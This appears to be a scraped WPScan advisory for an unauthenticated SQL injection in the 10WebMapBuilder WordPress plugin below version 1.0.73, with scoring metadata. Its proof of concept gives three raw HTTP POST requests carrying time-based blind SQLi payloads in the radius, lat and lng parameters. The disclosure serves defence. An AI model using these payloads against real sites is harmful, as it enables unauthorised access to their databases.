Lucene search

K
wpvulndbDaniel KrohmerWPVDB-ID:33AB1FE2-6611-4F43-91BA-52C56F02ED56
HistoryFeb 20, 2023 - 12:00 a.m.

10WebMapBuilder < 1.0.73 - Unauthenticated SQLi

2023-02-2000:00:00
Daniel Krohmer
wpscan.com
4
10webmapbuilder
sql injection
ajax action
unauthenticated users
security vulnerability
wordpress plugin

0.003 Low

EPSS

Percentile

70.7%

The plugin does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection

PoC

Note: /2022/12/29/map/ is page/post where the Google_Maps_WD is embed POST /2022/12/29/map/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 85 radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&lat;=0.0&lng;=0.0&distance;_in=km POST /2022/12/29/map/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 171 radius=1&lat;=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)–+)&lng;=0.0&distance;_in=km POST /2022/12/29/map/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 171 radius=1&lat;=0.0&lng;=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)–+)&distance;_in=km

CPENameOperatorVersion
wd-google-mapslt1.0.73

0.003 Low

EPSS

Percentile

70.7%

Related for WPVDB-ID:33AB1FE2-6611-4F43-91BA-52C56F02ED56